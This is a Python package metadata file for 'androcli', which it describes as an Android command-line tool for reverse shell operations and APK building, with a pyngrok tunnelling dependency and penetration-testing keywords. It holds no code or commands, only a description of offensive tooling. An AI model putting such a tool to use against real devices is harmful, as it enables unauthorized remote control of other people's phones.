Metadata-Version: 2.4
Name: androcli
Version: 1.0.0
Summary: Android CLI tool for reverse shell operations and APK building
Home-page: https://github.com/AryanVBW/androcli
Author: AryanVBW
Author-email: AryanVBW <whitedevil367467@gmail.com>
Project-URL: Homepage, https://github.com/AryanVBW/androcli
Project-URL: Bug Reports, https://github.com/AryanVBW/androcli/issues
Project-URL: Source, https://github.com/AryanVBW/androcli
Keywords: android,reverse-shell,apk,cli,security,penetration-testing
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Information Technology
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.6
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Topic :: Software Development
Classifier: Topic :: System :: Networking
Classifier: Topic :: Security
Requires-Python: >=3.6
License-File: LICENSE
Requires-Dist: pyngrok
Dynamic: author
Dynamic: home-page
Dynamic: license-file
Dynamic: requires-python
